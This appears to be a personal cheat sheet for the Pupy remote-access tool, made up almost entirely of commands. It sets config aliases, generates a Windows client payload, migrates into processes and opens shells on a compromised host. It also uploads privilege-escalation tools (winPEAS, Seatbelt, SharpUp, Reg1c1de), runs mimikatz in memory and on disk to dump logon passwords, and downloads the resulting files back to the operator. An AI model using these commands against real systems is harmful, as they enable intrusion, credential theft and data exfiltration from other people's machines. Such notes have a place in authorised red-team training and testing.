link to project home: https://github.com/n1nj4sec/pupy
Modify pupy.conf Under the section starting with [aliases] you can add them
[aliases]
[aliases]
info = get_info
pyexec = pyexec
exec = shell_exec
shell = interactive_shell
winshell = run interactive_shell
kill = process_kill
mount = drives
upload-priv = run upload "/home/kali/tools/win-priv/winpriv.zip"
mkadmin = run mkdir "c:\admin"
h = help
winshell = run interactive_shell
unzip-priv = run zip -u "c:\windows\temp\winpriv.zip"
unzip-priv-admin = run zip -u "c:\windows\temp\winpriv.zip" -d "C:\admin"
seatbelt-full = run --b shell_exec "c:\admin\seatbelt.exe all full > c:\windows\temp\seatbelt_full.txt"
seatbelt-all = run --b shell_exec "c:\admin\seatbelt.exe all > c:\windows\temp\seatbelt_all.txt"
dfull = run download "c:\windows\temp\seatbelt_full.txt"
dall = run download "c:\windows\temp\seatbelt_all.txt"
mimi32 = run --b shell_exec "c:\admin\mimikatz\win32\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > c:\windows\temp\mimi32.txt"
mimi64 = run --b shell_exec "c:\admin\mimikatz\win64\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > c:\windows\temp\mimi64.txt"
gen -O windows -A x86 -f client
ps -i
migrate <pid>
sessions
Set Session to interact with
session -i <id>
run interactive_shell
shell
run -f 3 pyshell
run download 'C:\Windows\System32\cmd.exe'
run upload '/home/kali/tools/win-priv/winPEAS32.exe'
run memory_exec /home/kali/tools/win-exe/mimikatz/win32/mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
run memory_exec /home/kali/tools/win-exe/mimikatz/win64/mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
rdesktop -r 0
run memory_exec /home/kali/tools/win-priv/seatbelt.exe
run --b shell_exec "c:\windows\temp\seatbelt.exe all > c:\windows\temp\seatbelt_all.txt"
run download "c:\windows\temp\seatbelt_all.txt"
run upload "/home/kali/tools/win-priv/seatbelt.exe"
run --b shell_exec "c:\admin\mimikatz\win32\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > c:\admin\mimi32.txt"
Reg1c1de export HKLM writable keys
run --b shell_exec "C:\admin\Reg1c1de.exe -v -o=c:\admin\hklm.csv -r=HKLM -e"
run --b shell_exec "C:\admin\Reg1c1de.exe -v -o=c:\admin\hkcu.csv -r=HKCU -e"
run download "c:\admin\hklm_HKEY_LOCAL_MACHINE.csv"
run download "c:\admin\hkcu_HKEY_CURRENT_USER.csv"
run --b shell_exec "C:\admin\Reg1c1de.exe -v -o=c:\admin\hkcu.csv -r=HKCU -e"
run --b shell_exec "c:\admin\sharpup.exe > C:\admin\sharpup.txt"
run download "C:\admin\sharpup.txt"
run --b shell_exec "C:\admin\winpeas.bat > c:\admin\winpeas_output.txt"
run download "c:\admin\winpeas_output.txt"